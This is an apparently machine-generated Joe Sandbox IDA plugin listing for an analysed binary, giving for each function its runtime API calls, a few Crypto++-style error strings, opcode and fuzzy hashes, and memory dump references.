Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 96c16ea9bc4cb23ce195f8ad72f289fc9578f9d5a05f835367fa65bb0031a4b3
Instruction ID: 2bc498c9d793bf330269ece0ec79908b34222024aba6647657f0e6ca3ba72aa0
Opcode Fuzzy Hash: 96c16ea9bc4cb23ce195f8ad72f289fc9578f9d5a05f835367fa65bb0031a4b3
Instruction Fuzzy Hash: 6B41EF22B29B8192EB109B16A65416D6362EB04BE0F544735DE7D87BD5EF7CF0918304

Function 00007FF6F18ABE30 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF0C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF40
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF4A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ABF73

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 1eba7b7a7f2da7253baf1b2edd2396aeb8a50825c709a64e048d660277330e4a
Instruction ID: e4c51615c10b9e845c076d12e0a092b99c5d674226d9dfdfcf1a1ebc9ca9c832
Opcode Fuzzy Hash: 1eba7b7a7f2da7253baf1b2edd2396aeb8a50825c709a64e048d660277330e4a
Instruction Fuzzy Hash: F131E661B29746A6EF209B15D6003A8A356EB04BE4F580631DF7D8BBD5FF3CE0918344

Function 00007FF6F18B2240 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B233D

Strings

HashTransformation: can't truncate a , xrefs: 00007FF6F18B22C8
bytes, xrefs: 00007FF6F18B2306
byte digest to , xrefs: 00007FF6F18B22DA

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 432778473-1139078987
Opcode ID: bd2fc6a02f98805dc94eb4e00909ca8d2d06099a6d0f02b07f4a6c37d24295a9
Instruction ID: 5cebd333aff4e7c0c5a117df150e5dc35365d471c94ab96a273a2527241b54c7
Opcode Fuzzy Hash: bd2fc6a02f98805dc94eb4e00909ca8d2d06099a6d0f02b07f4a6c37d24295a9
Instruction Fuzzy Hash: 4C31C062729A8291EB60DB65E5603EEA361FF88BC0F444036CA6D877DAFF2CD544C740

Function 00007FF6F18B4EB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B4F67

Strings

TruncatedDigestSize, xrefs: 00007FF6F18B4FA2
PutMessage, xrefs: 00007FF6F18B4F8F
FilterWithBufferedInput: invalid buffer size, xrefs: 00007FF6F18B4F3A

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow
String ID: FilterWithBufferedInput: invalid buffer size$PutMessage$TruncatedDigestSize
API String ID: 432778473-3547780871
Opcode ID: 61f67bdecee4b6e32166a2bfe443cb96dd27ad04e014f9eac68d9225877d04c9
Instruction ID: 8e4c5019260da1aace1eade572bd209bbb42a2ce5bf69ab20be96ef33a79b367
Opcode Fuzzy Hash: 61f67bdecee4b6e32166a2bfe443cb96dd27ad04e014f9eac68d9225877d04c9
Instruction Fuzzy Hash: AF31BF32628B8692DB10CB55E6506E97360FB84BA4F441232EBBD87BE5EF3CD459C700

Function 00007FF6F18ACDB0 Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18ACE76
memmove.VCRUNTIME140 ref: 00007FF6F18ACE99
memmove.VCRUNTIME140 ref: 00007FF6F18ACEA8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ACEC9

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: a1a76f46bff213676c10719a4f32bbe5b6413d7611d36d59d55c4fc261e8dd5e
Instruction ID: a1d092e5954ba692f12d34e9ea2ecb1540686d603ad88a736d91746e5d9f0f91
Opcode Fuzzy Hash: a1a76f46bff213676c10719a4f32bbe5b6413d7611d36d59d55c4fc261e8dd5e
Instruction Fuzzy Hash: 2431D532B15B45A1EF259B52E6403A96291AB48BE4F544731DF7D877D1FF3CE0918340

Function 00007FF6F18ABF80 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18ABFB8
memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18AC058
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AC076

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: bd6835814f7d1d8a476ffc4a2d20dbb89747589f1d814f85c5d4c5ec94c222ac
Instruction ID: 93e406d961dd11cfd5081839655f954d064a1aad90143e0ac2c7ea932440ffcb
Opcode Fuzzy Hash: bd6835814f7d1d8a476ffc4a2d20dbb89747589f1d814f85c5d4c5ec94c222ac
Instruction Fuzzy Hash: 0721F822B5AB4296EB24AB56E6403B92551AF167E4F180730DF7D877D2FF3CA4829340

Function 00007FF6F18B9CA0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B9D56
memset.VCRUNTIME140 ref: 00007FF6F18B9D6E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B9D73
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B9D7F

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: 4093489d835ad6f4dcbe58c9cfa73e7c5576f63fbcb1203a584e96d48c076662
Instruction ID: 332b5601516928f469caffe777c0ec7cfb3465cf63a2e3f275e92bd769f9226d
Opcode Fuzzy Hash: 4093489d835ad6f4dcbe58c9cfa73e7c5576f63fbcb1203a584e96d48c076662
Instruction Fuzzy Hash: A421A2B2A29B8192EB54CB56E65026977A1FB447D0F084231DA7D83BD5EF3CE490C340

Function 00007FF6F18B0440 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B04D0
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B0503

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00007FF6F18B04D6
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00007FF6F18B04A3

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 432778473-3345525433
Opcode ID: 4b40a2191e89895b5de2248b967cd20d0c67ef47f308884eb54668ffa79655a9
Instruction ID: 60b74315a4bb56496a418dbc299202c86a08e851f0ecc82ca403d05129efccc4
Opcode Fuzzy Hash: 4b40a2191e89895b5de2248b967cd20d0c67ef47f308884eb54668ffa79655a9
Instruction Fuzzy Hash: 13217C61A3864792EF60EB64E6913B92361BF853C4F401131EABCC76E6FF1EE5498700

Function 00007FF6F18AF040 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AF0F2

Part of subcall function 00007FF6F18B9E90: __std_type_info_compare.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9EB5

memset.VCRUNTIME140 ref: 00007FF6F18AF0FE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AF103
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AF10F

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: __std_type_info_compare_errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 3858425197-0
Opcode ID: de63e06b3c558558498d2a57f69aa2aa680b5b87d89ff4b422b68e761c19e5b0
Instruction ID: 5a2c7f2daa875647ce45040676344c806953b7ec356220ceb8ae8cb44400ded8
Opcode Fuzzy Hash: de63e06b3c558558498d2a57f69aa2aa680b5b87d89ff4b422b68e761c19e5b0
Instruction Fuzzy Hash: 3021A065A18B8292EB189F66E6400AD7761FB05BD4B084235EF7D877DAEF3CE590C340

Function 00007FF6F18AE220 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AE296
memset.VCRUNTIME140 ref: 00007FF6F18AE2A2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE2A7
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE2B3

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: 5d89e56dd7a9633b4f058f30f7bcb687f8c765e34327d66b4925b4314e48bb9d
Instruction ID: fbbf2d126444b441abc7f203278874e4f2e8a686bd4e36f952d8dca45738eb45
Opcode Fuzzy Hash: 5d89e56dd7a9633b4f058f30f7bcb687f8c765e34327d66b4925b4314e48bb9d
Instruction Fuzzy Hash: 832192B6A15B4197DB549F99E5801AC37A1FB08BC0B145432EA7C837D5EF3CE4A1C740

Function 00007FF6F18CD458 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6F18CD4A1
GetLastError.KERNEL32 ref: 00007FF6F18CD4AF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6F18AAF99), ref: 00007FF6F18CD4E4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6F18AAF99), ref: 00007FF6F18CD4F2

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 6361c0deab0d11ff38389974125d8980fadd2f04700b18f350195da18e37cac5
Instruction ID: cbe42f14d1b66e4146791a931cb0f05738bef6edde0b2f8158bc2906c19a7c14
Opcode Fuzzy Hash: 6361c0deab0d11ff38389974125d8980fadd2f04700b18f350195da18e37cac5
Instruction Fuzzy Hash: F1214F72B28B8287E7109F11E54432EBAB4FB99BD4F144235DB9993B94DF3CD8418B40

Function 00007FF6F18AE2F0 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,00007FF6F18AE2C7), ref: 00007FF6F18AE357

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 5418c756e105cab108bdd91475a010b3ccecc66168e3954184b4f5a9411d25d3
Instruction ID: 30d0aced960f1b95f5cfd4b2f89bb027ff35dc7331f1f3748ae527fb3fd6be3b
Opcode Fuzzy Hash: 5418c756e105cab108bdd91475a010b3ccecc66168e3954184b4f5a9411d25d3
Instruction Fuzzy Hash: 27111C62B19B4192EF58DB9AF68016862A1FB48FC0B589435DE7D87785EF3CD4E18340

Function 00007FF6F18B2720 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B277A
memset.VCRUNTIME140(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B2790
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B2795
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B27A1

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: a2f1b08447b5a0148fa46febc7046c01e4a06c772403365860e02d9507873f2a
Instruction ID: 8e6b9dd45df90184bd4a7fb750e812c1dd3136a415969de9f56bd00cd0da4f6b
Opcode Fuzzy Hash: a2f1b08447b5a0148fa46febc7046c01e4a06c772403365860e02d9507873f2a
Instruction Fuzzy Hash: 98115E62A14B8682EB14DB9AA5543BC2792EB4AFC4F4C0039CE2D87381EF3DE4D1C354

Function 00007FF6F18B2680 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26DA
memset.VCRUNTIME140(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26ED
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26F2
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26FE

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: c22bd0e5ba5d9bd90f9bbbbdf9725982b08975570ef5e3106926a7ac2fae696b
Instruction ID: dfe3e5e869f5c5f7f23dfd133c0ae5f60e4c280a93c03e66b2924b5f6e5668ae
Opcode Fuzzy Hash: c22bd0e5ba5d9bd90f9bbbbdf9725982b08975570ef5e3106926a7ac2fae696b
Instruction Fuzzy Hash: A8015EA6A1578582EB14DB9995443AD2792FF09BC4F5C0038CE3C8B391EF3DA4E6D314

Function 00007FF6F18AA630 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,00007FF6F18AA574), ref: 00007FF6F18AA68A
memset.VCRUNTIME140(?,?,?,00007FF6F18AA574), ref: 00007FF6F18AA69D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6F18AA574), ref: 00007FF6F18AA6A2
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6F18AA574), ref: 00007FF6F18AA6AE

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: 4082a79a22abe8940f2d988e9841aec826675b5ae0378d37a3722b949097939e
Instruction ID: 79fc998bbbe1842c1251d2cd01c758a2e96dc73848d509862d4dafce448961a0
Opcode Fuzzy Hash: 4082a79a22abe8940f2d988e9841aec826675b5ae0378d37a3722b949097939e
Instruction Fuzzy Hash: F8018EE2A1470582EB258F99994436826A1FB49BD4F181138CE2C5B3D1EF3CE4E28710

Function 00007FF6F18B89C0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B89D2
?set_new_handler@std@@YAP6AXXZP6AXXZ@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B89F2
_aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B8A01
_CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B8A2D

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
